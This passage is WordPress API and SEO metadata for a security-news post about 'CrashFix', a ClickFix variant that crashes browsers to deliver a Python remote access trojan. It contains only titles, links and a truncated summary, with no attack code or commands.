Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311\",\"datePublished\":\"2026-02-05T14:35:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39281\"},\"wordCount\":2641,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"mssecure\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39281#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39281\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39281\",\"name\":\"New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access 
Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-05T14:35:26+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39281#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39281\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39281#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 
redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39281","og_locale":"en_US","og_type":"article","og_title":"New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-05T19:57:56&#8243;,&#8221;description&#8221;:&#8221;In January 2026, Microsoft Defender Experts identified a new evolution in the ongoing ClickFix campaign. 
This updated tactic deliberately crashes victims\u2019 browsers and then attempts...","og_url":"https:\/\/zero.redgem.net\/?p=39281","og_site_name":"zero redgem","article_published_time":"2026-02-05T14:35:26+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39281#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39281"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311","datePublished":"2026-02-05T14:35:26+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39281"},"wordCount":2641,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","mssecure","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39281#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39281","url":"https:\/\/zero.redgem.net\/?p=39281","name":"New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311 - zero 
redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-05T14:35:26+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39281#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39281"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39281#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 
redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39281","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39281"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39281\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39281"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39281"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39281"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}